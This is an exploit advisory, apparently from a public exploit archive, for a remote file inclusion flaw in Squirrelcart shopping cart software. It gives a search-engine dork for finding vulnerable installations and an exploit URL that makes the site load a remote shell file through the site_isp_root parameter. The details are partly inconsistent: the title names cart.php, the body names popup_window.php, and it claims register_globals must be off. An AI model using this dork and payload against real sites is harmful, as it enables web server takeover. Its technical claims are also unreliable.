Squirrelcart <= 1.x.x (cart.php) Remote File Inclusion Vulnerability

2007-08-19 00:00:00

Title : Squirrelcart <= 1.x.x Remote File Inclusion
URL : http://squirrelcart.com/
Google Dork : inurl:"/squirrelcart/" -squirrelcart.com
Author : ShaiMagal

Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla";

Exploit : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt?

notes : register_globals = off is needed it seems.

#

Fixes

No fixes

In order to submit a new fix you need to be registered.